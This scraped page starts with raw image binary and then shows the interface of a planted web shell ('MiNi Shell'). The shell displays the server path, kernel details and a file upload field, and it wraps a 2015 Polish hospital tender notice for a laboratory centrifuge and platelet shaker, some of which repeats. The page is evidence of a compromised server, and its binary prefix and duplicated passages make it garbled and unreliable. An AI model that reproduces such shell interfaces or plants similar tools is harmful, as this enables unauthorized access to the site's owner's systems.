JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150320/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150320/62328-N-2015.html

<p class="kh_header"><b>Poznań: Dostawa  urządzeń do Centralnego Laboratorium; wirówki laboratoryjnej oraz wytrząsarki horyzontalnej do krwinek płytkowych bez inkubatora</b><br>
<b>Numer ogłoszenia: 62328 - 2015; data zamieszczenia: 20.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ginekologiczno-Położniczy Szpital Kliniczny Uniwersytetu Medycznego im. Karola Marcinkowskiego w Poznaniu , ul. Polna 33, 60-535 Poznań, woj. wielkopolskie, tel. 061 8419294, faks 061 8419620.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  urządzeń do Centralnego Laboratorium; wirówki laboratoryjnej oraz wytrząsarki horyzontalnej do krwinek płytkowych bez inkubatora.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa  urządzeń do Centralnego Laboratorium określonych według grup asortymentowych w  Załączniku  Nr 1 do SIWZ w  podziale  na  części:
Część Nr 1:  Wirówka laboratoryjna - 1 sztuka
Część Nr 2:  Wytrząsarka horyzontalna do krwinek płytkowych bez inkubatora  -  1  sztuka.

Opis przedmiotu zamówienia wraz z określeniem wymagań dotyczących jego realizacji został zawarty w  Załączniku Nr 1 do SIWZ.
Wszystkie podane parametry techniczne są parametrami minimalnymi. Wykonawca może zaproponować urządzenie o parametrach technicznych wyższych, lecz nie gorszych od wskazanych przez Zamawiającego.
2.	Warunki realizacji zamówienia:
2.1	Dostawa urządzeń fabrycznie nowych, nieużywanych,  nie starszych niż z II połowy 2014r. 
2.2	Okres gwarancji  nie krótszy  niż  24 miesiące od dnia podpisania protokołu odbioru przedmiotu zamówienia.
2.3	Zapewnienie przez Wykonawcę w ramach ceny, serwisu gwarancyjnego w okresie gwarancji, szkolenia personelu z zakresu użytkowania przedmiotu zamówienia przed podpisaniem protokołu odbioru przedmiotu zamówienia.
2.4	Dostawa  urządzeń identycznych z zaproponowanym w ofercie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, wymaganego zapisem rozdz. VI,  pkt. 1.1 specyfikacji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, wymaganego zapisem rozdz. VI,  pkt. 1.1 specyfikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, wymaganego zapisem rozdz. VI,  pkt. 1.1 specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, wymaganego zapisem rozdz. VI,  pkt. 1.1 specyfikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, wymaganego zapisem rozdz. VI,  pkt. 1.1 specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający  wymaga przedstawienia wraz z ofertą w szczególności:
Opisów oferowanych urządzeń w języku polskim i fotografii potwierdzających wymagane parametry dla przedmiotu zamówienia.
Na żądanie Zamawiającego Wykonawca poświadcza autentyczność dostarczonych opisów i fotografii.
Deklaracji Zgodności wydanej przez producenta oraz Certyfikatu Zgodności wydanego przez certyfikującą jednostkę notyfikowaną (jeżeli dotyczy).</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta wspólna 

W przypadku składania oferty przez dwa lub więcej podmiotów (Wykonawców ubiegających się wspólnie o udzielenie zamówienia, np. konsorcja) oferta spełniać musi następujące wymagania:
1.  W odniesieniu do wymagań postawionych przez Zamawiającego, każdy z Wykonawców występujących wspólnie, oddzielnie musi udokumentować, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 ustawy. Warunki udziału, o których mowa w art. 22 ust. 1 pkt. 2 - 4 spełnia co najmniej jeden z nich w wymaganym zakresie.
2.  Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców występujących wspólnie.
3.  Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu, albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego  (do oferty dołączyć odpowiednie pełnomocnictwo). 
4.  Pełnomocnictwo może być udzielone w szczególności:
	-  łącznie przez wszystkich Wykonawców (jeden dokument)
	- oddzielnie przez każdego z nich (tyle dokumentów ilu Wykonawców)
5.  Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik pozostałych. 
6.  Wykonawcy wspólnie ubiegający się  o zamówienie, których oferta zostanie uznana za  najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są zobowiązani  przedstawić Zamawiającemu umowę  regulującą współpracę tych podmiotów zawierającą następujące postanowienia:
a.	określenie celu  gospodarczego,
b.	określenie, który z podmiotów jest upoważniony do występowania w imieniu pozostałych przy realizacji zamówienia,
c.	oznaczenie czasu trwania obejmującego okres realizacji przedmiotu zamówienia,
d.	zakaz zmian w umowie bez zgody Zamawiającego.
Nie dopuszcza się składania umowy przedwstępnej lub umowy zawartej pod warunkiem zawieszającym.
	

Podwykonawcy 

1.  Definicja umowy o podwykonawstwo zgodnie z art. 2  pkt. 9a ustawy - Prawo zamówień publicznych
Umowa o podwykonawstwo - umowa w formie pisemnej o charakterze odpłatnym, której przedmiotem są usługi, dostawy lub roboty budowlane stanowiące część zamówienia publicznego, zawarta między wybranym przez  zamawiającego wykonawcą  a innym podmiotem (podwykonawcą), a w przypadku zamówień publicznych na roboty budowlane także między podwykonawcą a dalszym podwykonawcą lub między dalszymi podwykonawcami.

2.  Wykonawca może  powierzyć wykonanie części zamówienia podwykonawcy.

3.  Zamawiający żąda  wskazania  przez Wykonawcę w Załączniku Nr 3 do SIWZ ( Formularz Oferty)  części zamówienia, której wykonanie zamierza  powierzyć podwykonawcy oraz podania przez Wykonawcę nazw (firm)  podwykonawców, na których zasoby Wykonawca powołuje się na zasadach  określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art.  22 ust. 1.

4.  Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.

5.  Za prace zrealizowane  przez Podwykonawców Wykonawca będzie odpowiadał jak za własne.

OPIS SPOSOBU PRZYGOTOWANIA OFERT

1.	Wymagania  ogólne
1.1	Wykonawca  może  złożyć tylko  jedną  kompletną  ofertę.
1.2	Oferta  musi  być  złożona  w  formie  pisemnej,  zgodnie  z  wymaganiami  opisanymi  w   niniejszej  specyfikacji.
1.3	Oferta winna  być  sporządzona  w  języku  polskim,  na  maszynie  do  pisania,  komputerze lub  inną  trwałą,  czytelną techniką.  Złożone  materiały  powinny  być  spięte,  wszystkie  strony  oferty  zawierające  jakąkolwiek  treść  winny  być  ponumerowane, podpisane  przez  upoważnionego  przedstawiciela  Wykonawcy  i  opatrzone  pieczątką.  
Strony puste nie wymagają  numeracji,  podpisów  i  pieczątek.  Ewentualne  poprawki  w  tekście oferty  muszą  być  naniesione  w  czytelny  sposób,  parafowane  i  datowane  własnoręcznie  przez  osobę  podpisującą  ofertę.
1.4	Dokumenty sporządzone w języku obcym należy złożyć  wraz  z  tłumaczeniem  na  język  polski.

2.	Zawartość  oferty  i  sposób  jej  przedstawienia
2.1	Ofertę stanowi wypełniony formularz Formularz oferty, Załącznik Nr 2  do  specyfikacji oraz niżej wymienione dokumenty:
a.	Formularz asortymentowo-cenowy:  Załącznik Nr 1 do specyfikacji.

2.2	Wraz z ofertą  należy złożyć:
a.	Oświadczenia i dokumenty  wskazane   w  rozdziale VI  specyfikacji.
b.	Pełnomocnictwo do podpisania oferty (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą.
c.	Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której wynikać będzie przedmiotowe pełnomocnictwo (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza). Pełnomocnik  może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy.
2.3	Oferta wraz z załącznikami  musi  być  podpisana  przez  osobę  upoważnioną  do  reprezentowania  Wykonawcy, zgodnie z formą reprezentacji Wykonawcy określoną w rejestrze lub innym dokumencie, właściwym dla danej formy organizacyjnej Wykonawcy albo przez upełnomocnionego przedstawiciela Wykonawcy.

3.	Opakowanie  oferty
3.1	Wykonawca  umieszcza  ofertę  w  nieprzejrzystym,  zamkniętym  opakowaniu,  które:
a.  będzie  zaadresowane  na  Zamawiającego,
b. będzie posiadać oznaczenia: Oferta na dostawę urządzeń do Centralnego Laboratorium. Otwierają Osoby wyznaczone do wykonania czynności w postępowaniu dnia: 01.04.2015r. o godz. 09:30.
3.2	W przypadku załączenia do oferty dokumentów, których Zamawiający nie żąda zalecane jest ich oddzielenie od oferty i oznaczenie napisem DOKUMENTY UZUPEŁNIAJĄCE. 

1.	Kryteria oceny ofert

1.1	Przy wyborze i ocenie ofert złożonych w postępowaniu Zamawiający będzie kierował się następującymi kryteriami:
KRYTERIUM I:  Cena - 95%
Wartość punktowa kryterium CENA wyliczona zostanie wg wzoru:

Ilość punktów =  Cena oferty z najniższą ceną / Cena oferty badanej x 100 x 95%

KRYTERIUM II:  Okres gwarancji - 5%
Wartość punktowa kryterium OKRES GWARANCJI wyliczona zostanie wg wzoru:

Ilość punktów = Okres gwarancji z oferty badanej / Okres gwarancji najkorzystniejszy spośród złożonych ofert x 100 x 5%

Zamawiający określa: minimalny okres gwarancji - 24 miesiące,  maksymalny okres gwarancji  36 miesięcy.

Za najkorzystniejszą zostanie uznana oferta, która uzyska w sumie największą ilość punktów.
Wyliczenie punktów zostanie dokonane z dokładnością do dwóch miejsc po przecinku.
1.2	W oparciu o powyższe kryteria zostanie sporządzony ranking złożonych ofert. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wymaganiom przedstawionym w ustawie - Prawo zamówień publicznych oraz specyfikacji  i uzyska największą ilość punktów.
1.3	W  przypadku, jeżeli  nie  można  dokonać  wyboru  oferty  najkorzystniejszej  z  uwagi  na  to,  że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną.
1.4	Jeżeli  zostanie  złożona  oferta,  której  wybór  prowadzić  będzie  do  powstania  obowiązku  podatkowego  Zamawiającego, zgodnie z przepisami o podatku od towarów i usług w zakresie dotyczącym wewnątrz-wspólnotowego  nabycia  towarów,  Zamawiający  w  celu  oceny  takiej  oferty  doliczy  do  przedstawionej  w  niej  ceny  podatek  od  towarów  i  usług,  który  będzie  miał  obowiązek  wpłacić  zgodnie  z  obowiązującymi  przepisami.
1.5	W  przypadku  złożenia  oferty  przez  Wykonawcę  mającego  swoją  siedzibę  w  kraju  spoza  obszaru  Unii  Europejskiej  Zamawiający  w  celu  oceny  takiej  oferty  doliczy  do  przedstawionej  w  niej  ceny  różnicę  w kwocie  należnego podatku VAT  oraz  pozostałych  należności,  których  obowiązek  uiszczenia  spoczywa na  Zamawiającym,  wynikających  z  innych  przepisów.

		             Okres gwarancji z oferty badanej / Okres gwarancji najkorzystniejszy spośród złożonych ofert x 100 x 5%
	Ilość punktów  = 
Zamawiający określa: minimalny okres gwarancji - 24 miesiące,  maksymalny okres gwarancji  36 miesięcy.


Za najkorzystniejszą zostanie uznana oferta, która uzyska w sumie największą ilość punktów.
Wyliczenie punktów zostanie dokonane z dokładnością do dwóch miejsc po przecinku.
1.2	W oparciu o powyższe kryteria zostanie sporządzony ranking złożonych ofert. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wymaganiom przedstawionym w ustawie - Prawo zamówień publicznych oraz specyfikacji  i uzyska największą ilość punktów.
1.3	W  przypadku, jeżeli  nie  można  dokonać  wyboru  oferty  najkorzystniejszej  z  uwagi  na  to,  że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę z niższą ceną.
1.4	Jeżeli  zostanie  złożona  oferta,  której  wybór  prowadzić  będzie  do  powstania  obowiązku  podatkowego  Zamawiającego, zgodnie z przepisami o podatku od towarów i usług w zakresie dotyczącym wewnątrz-wspólnotowego  nabycia  towarów,  Zamawiający  w  celu  oceny  takiej  oferty  doliczy  do  przedstawionej  w  niej  ceny  podatek  od  towarów  i  usług,  który  będzie  miał  obowiązek  wpłacić  zgodnie  z  obowiązującymi  przepisami.
1.5	W  przypadku  złożenia  oferty  przez  Wykonawcę  mającego  swoją  siedzibę  w  kraju  spoza  obszaru  Unii  Europejskiej  Zamawiający  w  celu  oceny  takiej  oferty  doliczy  do  przedstawionej  w  niej  ceny  różnicę  w kwocie  należnego podatku VAT  oraz  pozostałych  należności,  których  obowiązek  uiszczenia  spoczywa na  Zamawiającym,  wynikających  z  innych  przepisów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Z  uwzględnieniem  zapisu  art.  144  ust. 1  ustawy  Zamawiający  przewiduje  możliwość  dokonania  istotnych  zmian  postanowień  zawartej  umowy  w  stosunku  do  treści  oferty,  na  podstawie  której  dokonano  wyboru Wykonawcy  oraz  określa  warunki  tych  zmian  poprzez  wprowadzenie  do  zawartej  umowy  następujących  aneksów;
a.	aneks  w  zakresie  wymiany / uzupełnienia  elementów  składowych  sprzętu  w  sytuacji  gdy  wprowadzony  zostanie  do  sprzedaży  przez  Wykonawcę  produkt  zmodyfikowany / udoskonalony  oraz  w  przypadku  zaistnienia  konieczności  wymiany/uzupełnienia  elementów  składowych   sprzętu  w  związku  z  postępem  technologicznym
b.	aneks dopuszczający zmianę umówionego terminu wykonania zamówienia z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach
c.	aneks dopuszczający zmianę umówionego terminu wykonania zamówienia z powodu działań osób trzecich uniemożliwiających wykonanie dostaw, a które to działania nie są konsekwencją winy którejkolwiek ze stron.
2.	W  celu  dokonania  zmian  zapisów  umowy  wnioskowanych  przez  Stronę,  zobowiązana  jest  ona  pisemnie  wystąpić  z  propozycją  zmiany  warunków  umowy  wraz z  ich  uzasadnieniem,  z  co najmniej dwutygodniowym wyprzedzeniem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://dzp.gpsk.ump.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> GPSK UM Poznań, ul. Polna 33, Budynek E, pokój nr 104 lub pod adresem poczty elektronicznej:gczekalska@gpsk.am.poznan.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.04.2015 godzina 09:00, miejsce: Siedziba Zamawiającego w Poznaniu, przy ul. Polnej 33  - Kancelaria Ogólna, Budynek D, pokój nr 317.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa urządzeń do Centralnego Laboratorium.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wirówka laboratoryjna - 1 sztuka

Opis przedmiotu zamówienia wraz z określeniem wymagań dotyczących jego realizacji został zawarty w  Załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa urządzeń do Centralnego Laboratorium.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wytrząsarka horyzontalna do krwinek płytkowych bez inkubatora - 1 sztuka
Opis przedmiotu zamówienia wraz z określeniem wymagań dotyczących jego realizacji został zawarty w  Załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com